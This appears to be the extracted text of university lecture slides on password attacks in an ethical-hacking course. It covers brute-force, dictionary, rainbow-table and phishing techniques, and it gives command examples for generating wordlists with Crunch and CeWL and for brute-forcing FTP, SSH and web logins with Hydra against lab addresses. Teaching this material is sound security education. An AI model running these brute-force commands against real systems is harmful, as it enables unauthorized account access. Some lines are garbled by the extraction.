Testing & Ethical

Unit :Hacking&
2 Ethical
Hacking
Password Attacks

By:
Dr. Sumitra
 What is Password Cracking?

Password cracking is the process of using an

application program to identify an unknown
or forgotten password that allows access to a
computer or network resource. It is often used
to:
 Test the strength of passwords and systems.
 Recover lost or forgotten passwords.
 Gain unauthorized access to systems
(maliciously).
 How Passwords are Stored

 Unix Password File - It stores the hashed

value of passwords in the password file
instead of the actual passwords. Hashed
passwords were originally stored in the
publicly accessible file /etc/passwd.

 Windows Password File - The password file

for Windows, known as the Security
Accounts Manager (SAM) file, is located
in:C:\windows\system32\config\sam
Techniques of Password
Cracking
1.Brute Force Attack
How it works: The attacker tries every possible
combination of characters until the correct
password is found.

Example: For a 4-digit PIN, the attacker tries

0000, 0001, 0002, ..., up to 9999.

Strengths: Guaranteed to work given enough

time.

Weaknesses: Extremely time-consuming and

resource-intensive for long or complex passwords.
Techniques of Password
Cracking
2. Dictionary Attack

How it works: The attacker uses a pre-defined

list of words (a dictionary) to guess passwords.
Example: Trying common passwords like
"password," "123456," or "admin."

Strengths: Faster than brute force if the

password is a common word.

Weaknesses: Fails if the password is not in the

dictionary.

Use Case: Cracking weak or commonly used

Techniques of Password
Cracking
3. Rainbow Table Attack

How it works: The attacker uses precomputed

tables of hash values (rainbow tables) to reverse-
engineer hashed passwords.
Example: If a password hash matches a hash in
the rainbow table, the plaintext password is
revealed.

Strengths: Extremely fast for cracking unsalted

hashes.

Weaknesses: Requires large storage for rainbow

tables; ineffective against salted hashes.
Techniques of Password
Cracking
4. Phishing
How it works: The attacker tricks the user into
revealing their password through fake websites or
emails.

Example: A fake login page mimicking a bank or

social media site.

Strengths: Does not require technical cracking

skills.

Weaknesses: Relies on human error.

Use Case: Stealing credentials from unsuspecting

Techniques of Password
Cracking
5. Hybrid Attack

How it works: Combines dictionary and brute

force attacks by adding numbers or symbols to
dictionary words.
Example: Trying "password1," "password2," etc.

Strengths: More effective than pure dictionary

attacks.

Weaknesses: Still limited by the dictionary used.

Use Case: Cracking moderately complex

passwords.
 What are Wordlists?

 A wordlist is a file (a text file in most

cases but not limited to it) that contains
a set of values that the attacker
requires to provide to test a
mechanism.
 Location of wordlist in kali.
cd /usr/share /wordlists

 dirb directory for the wordlists to be

used while using the dirb tool to
perform Directory Bruteforce
Wordlist
 Wordlists

wxr-xr-x is a Linux file permission that means everyone can

ad a directory, but only the owner can change its contents
The first character of the permission code, d, indicates that it is a direct
he next three characters, rwx, represent the owner's permissions.
he following three characters, r-x, represent the group's permissions.
he last three characters, r-x, represent the permissions for others.

d rwx rwx r-x

Owner Group Others
Directory Read Read Read
Write Write Execute
Execute Execute
Wordlist

- rw- rw- r--

Owner Group Others

Read Read Read
Write Write

How we can change the Ownership:

chown new user directory name/file name

chown sumi pass.txt

Wordlist

Chmode (change mode):

r=4 - rw- rw- r--
w=2
x=1 6 6 4

7 7 5

Chmod 775 pass.txt

Wordlist

Fern-wifi directory which helps to break

the Wi-Fi Authentications.

rockyou.: It is very large with 1,44,42,062

values that could be passwords for a lot of
user accounts on the internet.
Crafting Wordlists

 Crunch
 CeWL

 Crunch :Crunch is a tool developed in C

by bofh28 that can create custom,
highly modifiable wordlists. It takes min
size, max size and alphanumeric
character sets as input and generates
any possible combination of words with
or without meaning and writes it out in
a text file
 Crunch
/usr/share/crunch
Crunch
 Crunch
Commands to generate the custom text file of
passwords
crunch 1 3 -o dict.txt

Alphanumeric Characters: A user can also

define the selected characters to be used while
generating a wordlist. Here, min size 5 and max
size 7 characters per words is being generated
while using the characters “p, a, s, s, 1, 2, and
3” as input.
crunch 5 7 pass123 -o dict.txt
 Crunch
Using codename character sets:These
codenames can be used while creating dictionary
files. For example, to create a wordlist of 4
characters per word using a mixture of
alphabets, numeric and special characters, one
can specify the charset.lst file using the “-f”
option and then specify code word “mixalpha-
numeric-all”
crunch 4 4 -f charset.lst mixalpha-numeric-all -
o dict.txt
 Crunch
Startblock in wordlists: A startblock can be
defined using the “-s” filter. By using this, we can
define from where a wordlist should start
generating.
crunch 4 4 -f charset.lst mixalpha-numeric-all -o
dict.txt -s abc1
Creating Dictionary with various pattern:
@ will insert lower case characters.
, will insert upper case characters.
% will insert numbers. crunch 6 6 -t
sumi%%% -o dict.txt
^ will insert symbols.
crunch -t @%^ -o dict.txt
 Crunch

crunch 3 3 abc + 123 -t @%^ -o

pattern.txt
The above command create a dictionary with first
character lowercase, number as second character and
symbol as third but only “a,b or c” as characters, “1,2
or 3” as numbers and any random symbol on last
position respectively,
crunch 4 4 + + 123 + -t %%@^ -O
pattern2.txt
 Crunch
crunch 7 7 -t p@ss,%^ > dict.txt
crunch 7 7 -t p@ss,%^ -l a@aaaaa > 1.txt
 Treating symbols as literals:When “-l” is used in
accordance with the “-t” filter, it tells crunch which
symbols should be treated as literals.
 For example, we know that @ is used to denote a
lowercase letter. So, if we want to generate a 7
character per word wordlist using the word “p@ss”
fixed, it will consider @ as a pattern indicator of a
lowercase alphabets.
 Thereafter, -l filter can be used to define which
character is to be treated as literal and not converted
as pattern
 Crunch
Inverting Wordlist: using the “-i” option crunch
would fix the last letter first and make
combinations out of first letters.

crunch 5 5 abc12 -t @@@%% -o dict.txt

crunch 5 5 abc12 -t @@@%% -i -o invert.txt

Limit duplicate patterns: Using –d options limit

the duplicate

crunch 5 5 abc + 123 -t @@@%^ -o 1.txt

crunch 5 5 abc + 123 -t @@@%^ -o 2.txt
-d 2@
 Crunch
 Splitting wordlist based on size: To cut short a
file based on the size, we can use “-b” filter. For
example, to split a wordlist into multiple files each
of a maximum 1 MB we can do:
crunch 4 7 Pass123 -b 1mb -o START

 Note, that this only works with “-o START” which

will autoname the files in the format.
Compressing wordlist:

crunch 4 7 Pass123 -z gzip -o START

CeW

CeWL – A custom wordlist generator is a ruby

program that crawls a specific URL to a defined
depth and returns a list of keywords, which
password crackers like John the Ripper, Medusa,
and WFuzz can use to crack the passwords.
CeWL
CeWL
cewl http://www.vulnweb.com
 CeWL
Store this wordlist in a file:

cewl http://www.vulnweb.com -w dict.txt

Generating wordlists of a certain length: you can

choose to use option -m and provide the minimum
length for the keyword hence it will create wordlists for
a certain length.
cewl http://vulnweb.com / -m 10 -w dict.txt
 CeWL

Retrieval of Emails from the website: we can

use the -e option, while the -n option will hide the
lists created while crawling the provided website.

cewl http://www.vulnweb.com -e -n

To count the number of repeated words on

the website:

cewl http://www.vulnweb.com -c
 CeWL
Alphanumeric Wordlist : you may need an alpha-
numeric wordlist that you can use –the with-numbers
option to get an alpha-numeric wordlist.

cewl http://testphp.vulnweb.com --with-numbers

Cewl with Digest/Basic Authentication:It may

happen sometimes that some web applications may
have an authentication page for login and for that the
above basic command will not give desired results. So
for that, you need to bypass the authentication page by
using the command given below.
cewl http://testphp.vulnweb.com/login.php --auth_type Digest --auth_user
test –auth_pass test -v
CeWL

–auth_type:
Digest /Basic
–auth_user:
Authentication Username
–auth_pass:
Authentication password
Hydra (Password cracking
tools)
 Hydra is a parallelized login cracker which
supports numerous protocols to attack. It is
very fast and flexible, and new modules are
easy to add.

 It supports: Cisco AAA, Cisco auth, Cisco

enable, FTP, HTTP(S)-FORM-GET, HTTP(S)-
FORM-POST, HTTP(S)-GET, HTTP(S)-HEAD,
HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL,
MySQL, NNTP, POP3, PostgreSQL, RDP,
Rlogin, Rsh, SIP, SMB(NT), SMTP, SMTP
Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1
and v2), SSHKEY, Subversion, Teamspeak
(TS2), Telnet, VMware-Auth, VNC and XMPP.
 Hydra
To guess Password for specific username:

hydra -l msfadmin -P pass.txt

192.168.239.118 ftp
To guess username for specific password
hydra -L users.txt –p msfadmin
192.168.239.118 ftp
Brute forcing Username and Password:
hydra -L users.txt -P pass.txt 192.168.239.118 ftp
 Hydra

Verbose and Debug Mode:

-V option is used for verbose mode, where it will
show the login+pass combination for each attempt.

-d option used to enable debug mode. It shows the

complete detail of the attack with wait time, socket,
PID, RECV.
hydra -L users.txt -P pass.txt 192.168.239.118
ftp -V
hydra -l admin -P pass.txt 192.168.239.118 ftp
-d
Hydra
 Hydra

NULL/Same as Login or Reverse login Attempt:

Hydra has an option -e which will check 3 more

passwords while brute-forcing. [n] for null, [s] for
same i.e., as same as the username and [r] for reverse
i.e., the reverse of username.

hydra -L users.txt -P pass.txt 192.168.239.118 ftp -V -e

nsr
Saving output in txt file:

hydra -L users.txt -P pass.txt 192.168.239.118 ftp -

o result.txt
Hydra

To Resume Brute Force Attack: Attack gets

halted/paused accidentally due to some
unexpected behaviour by hydra.
So, hydra has solved this problem by including the
-R option so that you can resume the attack from
that position rather than starting from the
beginning.

hydra -L users.txt -P pass.txt 192.168.239.118 ftp

hydra -R
 Hydra

Password generating using various set of

characters:

To generate passwords using various set of

characters, you can use -x option. It is used as -x
min:max:charset
where:
Min: specifies minimum number of characters in a
password.
Max: specifies the maximum number of characters in
password.
Charset: charset can contain 1 for numbers, a for
lowercase and A for uppercase characters. Any other
character which is added is put to the list.
Hydra

To attack a specific port rather than default:

Network admins sometimes change the default

port number of some services for security reasons.
In the previous commands hydra was making
brute force attack on ftp service by just
mentioning the service name rather than port, but
as mentioned earlier default port gets changed at
this time hydra will help you with the -s option.

hydra -L users.txt -P pass.txt 192.168.239.118

ssh -s 2222
Hydra

Attacking Multiple Hosts: if there are multiple

hosts, for that you can use -M with the help of
which brute force is happening at multiple hosts.

hydra -L users.txt -P pass.txt -M hosts.txt ftp

-F option has provided that the attack will exit

after the first found login/password pair for any
host.
hydra -L users.txt -P pass.txt -M hosts.txt
ftp -F
Hydra

HTTP Login Form Brute Force:

The hydra form can be used to carry out a brute
force attack on simple web-based login forms that
requires username and password variables either
by GET or POST request.
 Hydra

hydra -l msfadmin -P pass.txt 192.168.55.118 http-post-form

'/dvwa/login.php:username=^USER^&password=^PASS^&Logi
n=Login:Login failed'
Hash
 The hash function goal is to ensure the
integrity of the data.

 A hash function accepts a variable-

length block of data as input and
produces a fixed-size hash value h =
H(M).
 Hash
Hash Output Size Security Use case
Function
MD5 128 bit (32 hex) Broken Checksum
SHA-1 160 bit (40 hex) Broken Legacy
Applications
SHA-256 256 bit (64 hex) Secure Digital
Signature,
Blockchain
SHA-384 384 bit (96 hex) Secure Cryptography
Application
SHA-512 512 bit (128 hex) Secure Cryptography
Application
How to take Meterpreter
session
Step 1 Take normal shell of target machine
How to take Meterpreter
session
How to take Meterpreter
session
How to take Meterpreter
session
How to take Meterpreter
session
How to take Meterpreter
session
How to crack password

Crunch
Crewl to generate the password list
Crunch :to generate custom list (permutation and
combination) brute force(meaningless word)
Minimum and maximum length
Hydra (best graphical and user interface)